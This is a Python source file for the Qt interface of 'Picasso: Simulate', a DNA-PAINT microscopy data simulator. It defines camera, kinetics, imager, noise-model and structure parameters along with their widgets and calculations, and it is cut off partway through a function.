plt.style.use("ggplot")
"DEFAULT PARAMETERS"
CURRENTROUND = 0
ADVANCEDMODE = 0 # 1 is with calibration of noise model
# CAMERA
IMAGESIZE_DEFAULT = 32
ITIME_DEFAULT = 300
FRAMES_DEFAULT = 7500
PIXELSIZE_DEFAULT = 160
# PAINT
KON_DEFAULT = 1600000
IMAGERCONCENTRATION_DEFAULT = 5
MEANBRIGHT_DEFAULT = 500
# IMAGER
LASERPOWER_DEFAULT = 1.5 # POWER DENSITY
POWERDENSITY_CONVERSION = 20
STDFACTOR = 1.82
if ADVANCEDMODE:
LASERPOWER_DEFAULT = 30
PSF_DEFAULT = 0.82
PHOTONRATE_DEFAULT = 53
PHOTONRATESTD_DEFAULT = 29
PHOTONBUDGET_DEFAULT = 1500000
PHOTONSLOPE_DEFAULT = 35
PHOTONSLOPESTD_DEFAULT = 19
if ADVANCEDMODE:
PHOTONSLOPE_DEFAULT = 1.77
PHOTONSLOPESTD_DEFAULT = 0.97
# NOISE MODEL
LASERC_DEFAULT = 0.012063
IMAGERC_DEFAULT = 0.003195
EQA_DEFAULT = -0.002866
EQB_DEFAULT = 0.259038
EQC_DEFAULT = 13.085473
BGOFFSET_DEFAULT = 0
BGSTDOFFSET_DEFAULT = 0
# STRUCTURE
STRUCTURE1_DEFAULT = 3
STRUCTURE2_DEFAULT = 4
STRUCTURE3_DEFAULT = "20,20"
STRUCTUREYY_DEFAULT = "0,20,40,60,0,20,40,60,0,20,40,60"
STRUCTUREXX_DEFAULT = "0,20,40,0,20,40,0,20,40,0,20,40"
STRUCTUREEX_DEFAULT = "1,1,1,1,1,1,1,1,1,1,1,1"
STRUCTURE3D_DEFAULT = "0,0,0,0,0,0,0,0,0,0,0,0"
STRUCTURENO_DEFAULT = 9
STRUCTUREFRAME_DEFAULT = 6
INCORPORATION_DEFAULT = 85
# Default 3D calibration
CX_DEFAULT = [
3.1638306844743706e-17,
-2.2103661248660896e-14,
-9.775815406044296e-12,
8.2178622893072e-09,
4.91181990105529e-06,
-0.0028759382006135654,
1.1756537760039398,
]
CY_DEFAULT = [
1.710907877866197e-17,
-2.4986657766862576e-15,
-8.405284979510355e-12,
1.1548322314075128e-11,
5.4270591055277476e-06,
0.0018155881468011011,
1.011468185618154,
]
class Window(QtWidgets.QMainWindow):
def __init__(self):
super().__init__()
self.setWindowTitle("Picasso: Simulate")
self.setSizePolicy(
QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding
)
this_directory = os.path.dirname(os.path.realpath(__file__))
icon_path = os.path.join(this_directory, "icons", "simulate.ico")
icon = QtGui.QIcon(icon_path)
self.setWindowIcon(icon)
self.initUI()
def initUI(self):
self.currentround = CURRENTROUND
self.structureMode = True
self.grid = QtWidgets.QGridLayout()
self.grid.setSpacing(5)
# CAMERA PARAMETERS
camera_groupbox = QtWidgets.QGroupBox("Camera parameters")
cgrid = QtWidgets.QGridLayout(camera_groupbox)
camerasize = QtWidgets.QLabel("Image size")
integrationtime = QtWidgets.QLabel("Integration time")
totaltime = QtWidgets.QLabel("Total acquisition time")
frames = QtWidgets.QLabel("Frames")
pixelsize = QtWidgets.QLabel("Pixelsize")
self.camerasizeEdit = QtWidgets.QSpinBox()
self.camerasizeEdit.setRange(1, 512)
self.integrationtimeEdit = QtWidgets.QSpinBox()
self.integrationtimeEdit.setRange(1, 10000) # 1-10.000ms
self.framesEdit = QtWidgets.QSpinBox()
self.framesEdit.setRange(10, 100000000) # 10-100.000.000 frames
self.framesEdit.setSingleStep(1000)
self.pixelsizeEdit = QtWidgets.QSpinBox()
self.pixelsizeEdit.setRange(1, 1000) # 1 to 1000 nm frame size
self.totaltimeEdit = QtWidgets.QLabel()
# Deactivate keyboard tracking
self.camerasizeEdit.setKeyboardTracking(False)
self.pixelsizeEdit.setKeyboardTracking(False)
self.camerasizeEdit.setValue(IMAGESIZE_DEFAULT)
self.integrationtimeEdit.setValue(ITIME_DEFAULT)
self.framesEdit.setValue(FRAMES_DEFAULT)
self.pixelsizeEdit.setValue(PIXELSIZE_DEFAULT)
self.integrationtimeEdit.valueChanged.connect(self.changeTime)
self.framesEdit.valueChanged.connect(self.changeTime)
self.camerasizeEdit.valueChanged.connect(self.generatePositions)
self.pixelsizeEdit.valueChanged.connect(self.changeStructDefinition)
cgrid.addWidget(camerasize, 1, 0)
cgrid.addWidget(self.camerasizeEdit, 1, 1)
cgrid.addWidget(QtWidgets.QLabel("Px"), 1, 2)
cgrid.addWidget(integrationtime, 2, 0)
cgrid.addWidget(self.integrationtimeEdit, 2, 1)
cgrid.addWidget(QtWidgets.QLabel("ms"), 2, 2)
cgrid.addWidget(frames, 3, 0)
cgrid.addWidget(self.framesEdit, 3, 1)
cgrid.addWidget(totaltime, 4, 0)
cgrid.addWidget(self.totaltimeEdit, 4, 1)
cgrid.addWidget(QtWidgets.QLabel("min"), 4, 2)
cgrid.addWidget(pixelsize, 5, 0)
cgrid.addWidget(self.pixelsizeEdit, 5, 1)
cgrid.addWidget(QtWidgets.QLabel("nm"), 5, 2)
cgrid.addItem(
QtWidgets.QSpacerItem(
1, 1, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding
)
)
# PAINT PARAMETERS
paint_groupbox = QtWidgets.QGroupBox("PAINT parameters")
pgrid = QtWidgets.QGridLayout(paint_groupbox)
kon = QtWidgets.QLabel("k<sub>On</sub>")
imagerconcentration = QtWidgets.QLabel("Imager concentration")
taud = QtWidgets.QLabel("Dark time")
taub = QtWidgets.QLabel("Bright time")
self.konEdit = QtWidgets.QDoubleSpinBox()
self.konEdit.setRange(1, 10000000000)
self.konEdit.setDecimals(0)
self.konEdit.setSingleStep(100000)
self.imagerconcentrationEdit = QtWidgets.QDoubleSpinBox()
self.imagerconcentrationEdit.setRange(0.01, 1000)
self.taudEdit = QtWidgets.QLabel()
self.taubEdit = QtWidgets.QDoubleSpinBox()
self.taubEdit.setRange(1, 10000)
self.taubEdit.setDecimals(0)
self.taubEdit.setSingleStep(10)
self.konEdit.setValue(KON_DEFAULT)
self.imagerconcentrationEdit.setValue(IMAGERCONCENTRATION_DEFAULT)
self.taubEdit.setValue(MEANBRIGHT_DEFAULT)
self.imagerconcentrationEdit.valueChanged.connect(self.changePaint)
self.konEdit.valueChanged.connect(self.changePaint)
pgrid.addWidget(kon, 1, 0)
pgrid.addWidget(self.konEdit, 1, 1)
pgrid.addWidget(QtWidgets.QLabel("M<sup>−1</sup>s<sup>−1</sup>"), 1, 2)
pgrid.addWidget(imagerconcentration, 2, 0)
pgrid.addWidget(self.imagerconcentrationEdit, 2, 1)
pgrid.addWidget(QtWidgets.QLabel("nM"), 2, 2)
pgrid.addWidget(taud, 3, 0)
pgrid.addWidget(self.taudEdit, 3, 1)
pgrid.addWidget(QtWidgets.QLabel("ms"), 3, 2)
pgrid.addWidget(taub, 4, 0)
pgrid.addWidget(self.taubEdit, 4, 1)
pgrid.addWidget(QtWidgets.QLabel("ms"), 4, 2)
pgrid.addItem(
QtWidgets.QSpacerItem(
1, 1, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding
)
)
# IMAGER Parameters
imager_groupbox = QtWidgets.QGroupBox("Imager parameters")
igrid = QtWidgets.QGridLayout(imager_groupbox)
laserpower = QtWidgets.QLabel("Power density")
if ADVANCEDMODE:
laserpower = QtWidgets.QLabel("Laserpower")
psf = QtWidgets.QLabel("PSF")
psf_fwhm = QtWidgets.QLabel("PSF(FWHM)")
photonrate = QtWidgets.QLabel("Photonrate")
photonsframe = QtWidgets.QLabel("Photons (frame)")
photonratestd = QtWidgets.QLabel("Photonrate Std")
photonstdframe = QtWidgets.QLabel("Photons Std (frame)")
photonbudget = QtWidgets.QLabel("Photonbudget")
photonslope = QtWidgets.QLabel("Photon detection rate")
photonslopeStd = QtWidgets.QLabel("Photonrate Std ")
self.laserpowerEdit = QtWidgets.QDoubleSpinBox()
self.laserpowerEdit.setRange(0, 10)
self.laserpowerEdit.setSingleStep(0.1)
self.psfEdit = QtWidgets.QDoubleSpinBox()
self.psfEdit.setRange(0, 3)
self.psfEdit.setSingleStep(0.01)
self.psf_fwhmEdit = QtWidgets.QLabel()
self.photonrateEdit = QtWidgets.QDoubleSpinBox()
self.photonrateEdit.setRange(0, 1000)
self.photonrateEdit.setDecimals(0)
self.photonsframeEdit = QtWidgets.QLabel()
self.photonratestdEdit = QtWidgets.QDoubleSpinBox()
self.photonratestdEdit.setRange(0, 1000)
self.photonratestdEdit.setDecimals(0)
self.photonstdframeEdit = QtWidgets.QLabel()
self.photonbudgetEdit = QtWidgets.QDoubleSpinBox()
self.photonbudgetEdit.setRange(0, 100000000)
self.photonbudgetEdit.setSingleStep(100000)
self.photonbudgetEdit.setDecimals(0)
self.photonslopeEdit = QtWidgets.QSpinBox()
self.photonslopeStdEdit = QtWidgets.QDoubleSpinBox()
self.laserpowerEdit.setValue(LASERPOWER_DEFAULT)
self.psfEdit.setValue(PSF_DEFAULT)
self.photonrateEdit.setValue(PHOTONRATE_DEFAULT)
self.photonratestdEdit.setValue(PHOTONRATESTD_DEFAULT)
self.photonbudgetEdit.setValue(PHOTONBUDGET_DEFAULT)
self.photonslopeEdit.setValue(PHOTONSLOPE_DEFAULT)
self.photonslopeStdEdit.setValue(PHOTONSLOPESTD_DEFAULT)
self.psfEdit.valueChanged.connect(self.changePSF)
self.photonrateEdit.valueChanged.connect(self.changeImager)
self.photonratestdEdit.valueChanged.connect(self.changeImager)
self.laserpowerEdit.valueChanged.connect(self.changeImager)
self.photonslopeEdit.valueChanged.connect(self.changeImager)
self.photonslopeStdEdit.valueChanged.connect(self.changeImager)
self.cx = CX_DEFAULT
self.cy = CY_DEFAULT
self.photonslopemodeEdit = QtWidgets.QCheckBox()
igrid.addWidget(psf, 0, 0)
igrid.addWidget(self.psfEdit, 0, 1)
igrid.addWidget(QtWidgets.QLabel("Px"), 0, 2)
igrid.addWidget(psf_fwhm, 1, 0)
igrid.addWidget(self.psf_fwhmEdit, 1, 1)
igrid.addWidget(QtWidgets.QLabel("nm"), 1, 2)
igrid.addWidget(laserpower, 2, 0)
igrid.addWidget(self.laserpowerEdit, 2, 1)
igrid.addWidget(QtWidgets.QLabel("kW cm<sup>-2<sup>"), 2, 2)
if ADVANCEDMODE:
igrid.addWidget(QtWidgets.QLabel("mW"), 2, 2)
igridindex = 1
if ADVANCEDMODE:
igrid.addWidget(photonrate, 3, 0)
igrid.addWidget(self.photonrateEdit, 3, 1)
igrid.addWidget(QtWidgets.QLabel("Photons ms<sup>-1<sup>"), 3, 2)
igridindex = 0
igrid.addWidget(photonsframe, 4 - igridindex, 0)
igrid.addWidget(self.photonsframeEdit, 4 - igridindex, 1)
igrid.addWidget(QtWidgets.QLabel("Photons"), 4 - igridindex, 2)
igridindex = 2
if ADVANCEDMODE:
igrid.addWidget(photonratestd, 5, 0)
igrid.addWidget(self.photonratestdEdit, 5, 1)
igrid.addWidget(QtWidgets.QLabel("Photons ms<sup>-1<sup"), 5, 2)
igridindex = 0
igrid.addWidget(photonstdframe, 6 - igridindex, 0)
igrid.addWidget(self.photonstdframeEdit, 6 - igridindex, 1)
igrid.addWidget(QtWidgets.QLabel("Photons"), 6 - igridindex, 2)
igrid.addWidget(photonbudget, 7 - igridindex, 0)
igrid.addWidget(self.photonbudgetEdit, 7 - igridindex, 1)
igrid.addWidget(QtWidgets.QLabel("Photons"), 7 - igridindex, 2)
igrid.addWidget(photonslope, 8 - igridindex, 0)
igrid.addWidget(self.photonslopeEdit, 8 - igridindex, 1)
photonslopeUnit = QtWidgets.QLabel(
"Photons ms<sup>-1</sup> kW<sup>-1</sup> cm<sup>2</sup>"
)
photonslopeUnit.setWordWrap(True)
igrid.addWidget(photonslopeUnit, 8 - igridindex, 2)
igrid.addWidget(self.photonslopemodeEdit, 9 - igridindex, 1)
igrid.addWidget(
QtWidgets.QLabel("Constant detection rate"), 9 - igridindex, 0
)
if ADVANCEDMODE:
igrid.addWidget(photonslopeStd, 10 - igridindex, 0)
igrid.addWidget(self.photonslopeStdEdit, 10 - igridindex, 1)
igrid.addWidget(
QtWidgets.QLabel(
"Photons ms<sup>-1</sup> kW<sup>-1</sup> cm<sup>2</sup>"
),
10 - igridindex,
2,
)
if not ADVANCEDMODE:
backgroundframesimple = QtWidgets.QLabel("Background (Frame)")
self.backgroundframesimpleEdit = QtWidgets.QLabel()
igrid.addWidget(backgroundframesimple, 12 - igridindex, 0)
igrid.addWidget(self.backgroundframesimpleEdit, 12 - igridindex, 1)
# Make a spinbox for adjusting the background level
backgroundlevel = QtWidgets.QLabel("Background level")
self.backgroundlevelEdit = QtWidgets.QSpinBox()
self.backgroundlevelEdit.setRange(1, 100)
igrid.addWidget(backgroundlevel, 11 - igridindex, 0)
igrid.addWidget(self.backgroundlevelEdit, 11 - igridindex, 1)
self.backgroundlevelEdit.valueChanged.connect(self.changeNoise)
# NOISE MODEL
noise_groupbox = QtWidgets.QGroupBox("Noise Model")
ngrid = QtWidgets.QGridLayout(noise_groupbox)
laserc = QtWidgets.QLabel("Lasercoefficient")
imagerc = QtWidgets.QLabel("Imagercoefficient")
EquationA = QtWidgets.QLabel("Equation A")
EquationB = QtWidgets.QLabel("Equation B")
EquationC = QtWidgets.QLabel("Equation C")
Bgoffset = QtWidgets.QLabel("Background Offset")
BgStdoffset = QtWidgets.QLabel("Background Std Offset")
backgroundframe = QtWidgets.QLabel("Background (Frame)")
noiseLabel = QtWidgets.QLabel("Noise (Frame)")
self.lasercEdit = QtWidgets.QDoubleSpinBox()
self.lasercEdit.setRange(0, 100000)
self.lasercEdit.setDecimals(6)
self.imagercEdit = QtWidgets.QDoubleSpinBox()
self.imagercEdit.setRange(0, 100000)
self.imagercEdit.setDecimals(6)
self.EquationBEdit = QtWidgets.QDoubleSpinBox()
self.EquationBEdit.setRange(-100000, 100000)
self.EquationBEdit.setDecimals(6)
self.EquationAEdit = QtWidgets.QDoubleSpinBox()
self.EquationAEdit.setRange(-100000, 100000)
self.EquationAEdit.setDecimals(6)
self.EquationCEdit = QtWidgets.QDoubleSpinBox()
self.EquationCEdit.setRange(-100000, 100000)
self.EquationCEdit.setDecimals(6)
self.lasercEdit.setValue(LASERC_DEFAULT)
self.imagercEdit.setValue(IMAGERC_DEFAULT)
self.EquationAEdit.setValue(EQA_DEFAULT)
self.EquationBEdit.setValue(EQB_DEFAULT)
self.EquationCEdit.setValue(EQC_DEFAULT)
self.BgoffsetEdit = QtWidgets.QDoubleSpinBox()
self.BgoffsetEdit.setRange(-100000, 100000)
self.BgoffsetEdit.setDecimals(6)
self.BgStdoffsetEdit = QtWidgets.QDoubleSpinBox()
self.BgStdoffsetEdit.setRange(-100000, 100000)
self.BgStdoffsetEdit.setDecimals(6)
for button in [
self.lasercEdit,
self.imagercEdit,
self.EquationAEdit,
self.EquationBEdit,
self.EquationCEdit,
]:
button.valueChanged.connect(self.changeNoise)
backgroundframe = QtWidgets.QLabel("Background (Frame)")
noiseLabel = QtWidgets.QLabel("Noise (Frame)")
self.backgroundframeEdit = QtWidgets.QLabel()
self.noiseEdit = QtWidgets.QLabel()
tags = [
laserc,
imagerc,
EquationA,
EquationB,
EquationC,
Bgoffset,
BgStdoffset,
backgroundframe,
noiseLabel,
]
buttons = [
self.lasercEdit,
self.imagercEdit,
self.EquationAEdit,
self.EquationBEdit,
self.EquationCEdit,
self.BgoffsetEdit,
self.BgStdoffsetEdit,
self.backgroundframeEdit,
self.noiseEdit,
]
for i, tag in enumerate(tags):
ngrid.addWidget(tag, i, 0)
ngrid.addWidget(buttons[i], i, 1)
calibrateNoiseButton = QtWidgets.QPushButton("Calibrate Noise Model")
calibrateNoiseButton.clicked.connect(self.calibrateNoise)
importButton = QtWidgets.QPushButton("Import from Experiment (hdf5)")
importButton.clicked.connect(self.importhdf5)
ngrid.addWidget(calibrateNoiseButton, 10, 0, 1, 3)
ngrid.addWidget(importButton, 11, 0, 1, 3)
        # HANDLE DEFINITIONS
structureIncorporation = QtWidgets.QLabel("Incorporation")
self.structureIncorporationEdit = QtWidgets.QDoubleSpinBox()
self.structureIncorporationEdit.setKeyboardTracking(False)
self.structureIncorporationEdit.setRange(1, 100)
self.structureIncorporationEdit.setDecimals(0)
self.structureIncorporationEdit.setValue(INCORPORATION_DEFAULT)
handles_groupbox = QtWidgets.QGroupBox("Handles")
hgrid = QtWidgets.QGridLayout(handles_groupbox)
hgrid.addWidget(structureIncorporation, 0, 0)
hgrid.addWidget(self.structureIncorporationEdit, 0, 1)
hgrid.addWidget(QtWidgets.QLabel("%"), 0, 2)
importHandlesButton = QtWidgets.QPushButton("Import handles")
importHandlesButton.clicked.connect(self.importHandles)
hgrid.addWidget(importHandlesButton, 1, 0, 1, 3)
# 3D Settings
self.mode3DEdit = QtWidgets.QCheckBox()
threed_groupbox = QtWidgets.QGroupBox("3D")
tgrid = QtWidgets.QGridLayout(threed_groupbox)
tgrid.addWidget(self.mode3DEdit, 0, 0)
tgrid.addWidget(QtWidgets.QLabel("3D"), 0, 1)
load3dCalibrationButton = QtWidgets.QPushButton("Load 3D Calibration")
load3dCalibrationButton.clicked.connect(self.load3dCalibration)
tgrid.addWidget(load3dCalibrationButton, 0, 2)
# STRUCTURE DEFINITIONS
structure_groupbox = QtWidgets.QGroupBox("Structure")
sgrid = QtWidgets.QGridLayout(structure_groupbox)
structureno = QtWidgets.QLabel("Number of structures")
structureframe = QtWidgets.QLabel("Frame")
self.structure1 = QtWidgets.QLabel("Columns")
self.structure2 = QtWidgets.QLabel("Rows")
self.structure3 = QtWidgets.QLabel("Spacing X,Y")
self.structure3Label = QtWidgets.QLabel("nm")
structurexx = QtWidgets.QLabel("Stucture X")
structureyy = QtWidgets.QLabel("Structure Y")
structure3d = QtWidgets.QLabel("Structure 3D")
structureex = QtWidgets.QLabel("Exchange labels")
structurecomboLabel = QtWidgets.QLabel("Type")
self.structurenoEdit = QtWidgets.QSpinBox()
self.structurenoEdit.setRange(1, 1000)
self.structureframeEdit = QtWidgets.QSpinBox()
self.structureframeEdit.setRange(4, 16)
self.structurexxEdit = QtWidgets.QLineEdit(STRUCTUREXX_DEFAULT)
self.structureyyEdit = QtWidgets.QLineEdit(STRUCTUREYY_DEFAULT)
self.structureexEdit = QtWidgets.QLineEdit(STRUCTUREEX_DEFAULT)
self.structure3DEdit = QtWidgets.QLineEdit(STRUCTURE3D_DEFAULT)
self.structurecombo = QtWidgets.QComboBox()
for entry in ["Grid", "Circle", "Custom"]:
self.structurecombo.addItem(entry)
self.structure1Edit = QtWidgets.QSpinBox()
self.structure1Edit.setKeyboardTracking(False)
self.structure1Edit.setRange(1, 1000)
self.structure1Edit.setValue(STRUCTURE1_DEFAULT)
self.structure2Edit = QtWidgets.QSpinBox()
self.structure2Edit.setKeyboardTracking(False)
self.structure2Edit.setRange(1, 1000)
self.structure2Edit.setValue(STRUCTURE2_DEFAULT)
self.structure3Edit = QtWidgets.QLineEdit(STRUCTURE3_DEFAULT)
self.structure1Edit.valueChanged.connect(self.changeStructDefinition)
self.structure2Edit.valueChanged.connect(self.changeStructDefinition)
self.structure3Edit.returnPressed.connect(self.changeStructDefinition)
self.structurenoEdit.setValue(STRUCTURENO_DEFAULT)
self.structureframeEdit.setValue(STRUCTUREFRAME_DEFAULT)
self.structurenoEdit.setKeyboardTracking(False)
self.structureframeEdit.setKeyboardTracking(False)
self.structurexxEdit.returnPressed.connect(self.generatePositions)
self.structureyyEdit.returnPressed.connect(self.generatePositions)
self.structureexEdit.returnPressed.connect(self.generatePositions)
self.structure3DEdit.returnPressed.connect(self.generatePositions)
self.structurenoEdit.valueChanged.connect(self.generatePositions)
self.structureframeEdit.valueChanged.connect(self.generatePositions)
self.structurerandomOrientationEdit = QtWidgets.QCheckBox()
self.structurerandomEdit = QtWidgets.QCheckBox()
structurerandom = QtWidgets.QLabel("Random arrangement")
structurerandomOrientation = QtWidgets.QLabel("Random orientation")
self.structurerandomEdit.stateChanged.connect(self.generatePositions)
self.structurerandomOrientationEdit.stateChanged.connect(
self.generatePositions
)
self.structureIncorporationEdit.valueChanged.connect(
self.generatePositions
)
self.structurecombo.currentIndexChanged.connect(
self.changeStructureType
)
sgrid.addWidget(structureno, 1, 0)
sgrid.addWidget(self.structurenoEdit, 1, 1)
sgrid.addWidget(structureframe, 2, 0)
sgrid.addWidget(self.structureframeEdit, 2, 1)
sgrid.addWidget(QtWidgets.QLabel("Px"), 2, 2)
        sgrid.addWidget(structurecomboLabel, 3, 0)
sgrid.addWidget(self.structurecombo, 3, 1)
sgrid.addWidget(self.structure1, 4, 0)
sgrid.addWidget(self.structure1Edit, 4, 1)
sgrid.addWidget(self.structure2, 5, 0)
sgrid.addWidget(self.structure2Edit, 5, 1)
sgrid.addWidget(self.structure3, 6, 0)
sgrid.addWidget(self.structure3Edit, 6, 1)
sgrid.addWidget(self.structure3Label, 6, 2)
sgrid.addWidget(structurexx, 7, 0)
sgrid.addWidget(self.structurexxEdit, 7, 1)
sgrid.addWidget(QtWidgets.QLabel("nm"), 7, 2)
sgrid.addWidget(structureyy, 8, 0)
sgrid.addWidget(self.structureyyEdit, 8, 1)
sgrid.addWidget(QtWidgets.QLabel("nm"), 8, 2)
sindex = 0
sgrid.addWidget(structure3d, 9, 0)
sgrid.addWidget(self.structure3DEdit, 9, 1)
sindex = 1
sgrid.addWidget(structureex, 9 + sindex, 0)
sgrid.addWidget(self.structureexEdit, 9 + sindex, 1)
        sindex -= 1
sgrid.addWidget(structurerandom, 11 + sindex, 1)
sgrid.addWidget(self.structurerandomEdit, 11 + sindex, 0)
sgrid.addWidget(structurerandomOrientation, 12 + sindex, 1)
sgrid.addWidget(self.structurerandomOrientationEdit, 12 + sindex, 0)
        sindex -= 2
importDesignButton = QtWidgets.QPushButton("Import structure from design")
importDesignButton.clicked.connect(self.importDesign)
sgrid.addWidget(importDesignButton, 15 + sindex, 0, 1, 3)
generateButton = QtWidgets.QPushButton("Generate positions")
generateButton.clicked.connect(self.generatePositions)
sgrid.addWidget(generateButton, 17 + sindex, 0, 1, 3)
cgrid.addItem(
QtWidgets.QSpacerItem(
1, 1, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding
)
)
simulateButton = QtWidgets.QPushButton("Simulate data")
self.exchangeroundsEdit = QtWidgets.QLineEdit("1")
self.conroundsEdit = QtWidgets.QSpinBox()
self.conroundsEdit.setRange(1, 1000)
quitButton = QtWidgets.QPushButton("Quit", self)
quitButton.clicked.connect(QtCore.QCoreApplication.instance().quit)
quitButton.resize(quitButton.sizeHint())
loadButton = QtWidgets.QPushButton(
"Load settings from previous simulation"
)
btngridR = QtWidgets.QGridLayout()
self.concatExchangeEdit = QtWidgets.QCheckBox()
self.exportkinetics = QtWidgets.QCheckBox()
btngridR.addWidget(loadButton, 0, 0, 1, 2)
btngridR.addWidget(
QtWidgets.QLabel("Exchange rounds to be simulated:"), 1, 0
)
btngridR.addWidget(self.exchangeroundsEdit, 1, 1)
btngridR.addWidget(QtWidgets.QLabel("Concatenate several rounds:"), 2, 0)
btngridR.addWidget(self.conroundsEdit, 2, 1)
btngridR.addWidget(QtWidgets.QLabel("Concatenate Exchange"))
btngridR.addWidget(self.concatExchangeEdit, 3, 1)
btngridR.addWidget(QtWidgets.QLabel("Export kinetic data"))
btngridR.addWidget(self.exportkinetics, 4, 1)
btngridR.addWidget(simulateButton, 5, 0, 1, 2)
btngridR.addWidget(quitButton, 6, 0, 1, 2)
simulateButton.clicked.connect(self.simulate)
loadButton.clicked.connect(self.loadSettings)
self.show()
self.changeTime()
self.changePSF()
self.changeNoise()
self.changePaint()
pos_groupbox = QtWidgets.QGroupBox("Positions [Px]")
str_groupbox = QtWidgets.QGroupBox("Structure [nm]")
posgrid = QtWidgets.QGridLayout(pos_groupbox)
strgrid = QtWidgets.QGridLayout(str_groupbox)
self.figure1 = plt.figure()
self.figure2 = plt.figure()
self.canvas1 = FigureCanvas(self.figure1)
csize = 180
self.canvas1.setMinimumSize(csize, csize)
self.canvas2 = FigureCanvas(self.figure2)
self.canvas2.setMinimumSize(csize, csize)
posgrid.addWidget(self.canvas1)
strgrid.addWidget(self.canvas2)
self.mainpbar = QtWidgets.QProgressBar(self)
# Arrange Buttons
if ADVANCEDMODE:
self.grid.addWidget(pos_groupbox, 1, 0)
self.grid.addWidget(str_groupbox, 1, 1)
self.grid.addWidget(structure_groupbox, 2, 0, 2, 1)
self.grid.addWidget(camera_groupbox, 1, 2)
self.grid.addWidget(paint_groupbox, 3, 1)
self.grid.addWidget(imager_groupbox, 2, 1)
self.grid.addWidget(noise_groupbox, 2, 2)
self.grid.addLayout(btngridR, 3, 2)
self.grid.addWidget(self.mainpbar, 5, 0, 1, 4)
self.grid.addWidget(threed_groupbox, 4, 0)
self.grid.addWidget(handles_groupbox, 4, 1)
else:
# Left side
self.grid.addWidget(pos_groupbox, 1, 0)
self.grid.addWidget(str_groupbox, 1, 1)
self.grid.addWidget(structure_groupbox, 2, 0)
self.grid.addWidget(paint_groupbox, 3, 0)
self.grid.addWidget(handles_groupbox, 4, 0)
self.grid.addWidget(threed_groupbox, 5, 0)
# Right side
self.grid.addWidget(imager_groupbox, 2, 1)
self.grid.addWidget(camera_groupbox, 3, 1)
self.grid.addLayout(btngridR, 4, 1, 2, 1)
self.grid.addWidget(self.mainpbar, 8, 0, 1, 4)
mainWidget = QtWidgets.QWidget()
mainWidget.setLayout(self.grid)
self.setCentralWidget(mainWidget)
self.setGeometry(300, 300, 300, 150)
# CALL FUNCTIONS
self.generatePositions()
self.mainpbar.setValue(0)
self.statusBar().showMessage("Simulate ready.")
def load3dCalibration(self):
# if hasattr(self.window, 'movie_path'):
# dir = os.path.dirname(self.window.movie_path)
# else:
dir = None
path, ext = QtWidgets.QFileDialog.getOpenFileName(
self, "Load 3d calibration", directory=dir, filter="*.yaml"
)
if path:
with open(path, "r") as f:
                z_calibration = yaml.load(f, Loader=yaml.FullLoader)
self.cx = _np.array(z_calibration["X Coefficients"])
self.cy = _np.array(z_calibration["Y Coefficients"])
self.statusBar().showMessage("Caliration loaded from: " + path)
def changeTime(self):
laserpower = self.laserpowerEdit.value()
itime = self.integrationtimeEdit.value()
frames = self.framesEdit.value()
totaltime = itime * frames / 1000 / 60
totaltime = round(totaltime * 100) / 100
self.totaltimeEdit.setText(str(totaltime))
photonslope = self.photonslopeEdit.value()
photonslopestd = photonslope / STDFACTOR
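        # Photon rate scales linearly with laser power (rate = slope * power);
        # photons per frame are the rate multiplied by the integration time.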
if ADVANCEDMODE:
photonslopestd = self.photonslopeStdEdit.value()
photonrate = photonslope * laserpower
photonratestd = photonslopestd * laserpower
photonsframe = round(photonrate * itime)
photonsframestd = round(photonratestd * itime)
self.photonsframeEdit.setText(str(photonsframe))
self.photonstdframeEdit.setText(str(photonsframestd))
self.changeNoise()
def changePaint(self):
kon = self.konEdit.value()
imagerconcentration = self.imagerconcentrationEdit.value()
taud = round(1 / (kon * imagerconcentration * 1 / 10 ** 9) * 1000)
self.taudEdit.setText(str(taud))
self.changeNoise()
def changePSF(self):
psf = self.psfEdit.value()
pixelsize = self.pixelsizeEdit.value()
psf_fwhm = round(psf * pixelsize * 2.355)
self.psf_fwhmEdit.setText(str(psf_fwhm))
def changeImager(self):
laserpower = self.laserpowerEdit.value()
itime = self.integrationtimeEdit.value()
photonslope = self.photonslopeEdit.value()
photonslopestd = photonslope / STDFACTOR
if ADVANCEDMODE:
photonslopestd = self.photonslopeStdEdit.value()
photonrate = photonslope * laserpower
photonratestd = photonslopestd * laserpower
photonsframe = round(photonrate * itime)
photonsframestd = round(photonratestd * itime)
self.photonsframeEdit.setText(str(photonsframe))
self.photonstdframeEdit.setText(str(photonsframestd))
        self.photonrateEdit.setValue(photonrate)
        self.photonratestdEdit.setValue(photonratestd)
self.changeNoise()
def changeNoise(self):
itime = self.integrationtimeEdit.value()
imagerconcentration = self.imagerconcentrationEdit.value()
laserpower = self.laserpowerEdit.value() * POWERDENSITY_CONVERSION
bglevel = self.backgroundlevelEdit.value()
if ADVANCEDMODE:
# NEW NOISE MODEL
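            # Background model: bg = (laserc + imagerc * [imager]) * P_laser * t_int + offset
            # Std model:        std = A * P_laser * t_int + B * bg + C + std_offset * level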
laserc = self.lasercEdit.value()
imagerc = self.imagercEdit.value()
bgoffset = self.BgoffsetEdit.value()
bgmodel = (
laserc + imagerc * imagerconcentration
) * laserpower * itime + bgoffset
equationA = self.EquationAEdit.value()
equationB = self.EquationBEdit.value()
equationC = self.EquationCEdit.value()
bgstdoffset = self.BgStdoffsetEdit.value()
bgmodelstd = (
equationA * laserpower * itime
+ equationB * bgmodel
+ equationC
+ bgstdoffset * bglevel
)
self.backgroundframeEdit.setText(str(int(bgmodel)))
self.noiseEdit.setText(str(int(bgmodelstd)))
else:
bgmodel = (
(LASERC_DEFAULT + IMAGERC_DEFAULT * imagerconcentration)
* laserpower
* itime
* bglevel
)
self.backgroundframesimpleEdit.setText(str(int(bgmodel)))
def changeStructureType(self):
typeindex = self.structurecombo.currentIndex()
        # TYPEINDEX: 0 = GRID, 1 = CIRCLE, 2 = CUSTOM,
        # 3 = HANDLES (only reachable if a 'Handles' entry is added to the combo box)
if typeindex == 0:
self.structure1.show()
self.structure2.show()
self.structure3.show()
self.structure1Edit.show()
self.structure2Edit.show()
self.structure3Edit.show()
self.structure3Label.show()
self.structure1.setText("Columns")
self.structure2.setText("Rows")
self.structure3.setText("Spacing X,Y")
self.structure1Edit.setValue(3)
self.structure2Edit.setValue(4)
self.structure3Edit.setText("20,20")
elif typeindex == 1:
self.structure1.show()
self.structure2.show()
self.structure3.show()
self.structure1Edit.show()
self.structure2Edit.show()
self.structure3Edit.show()
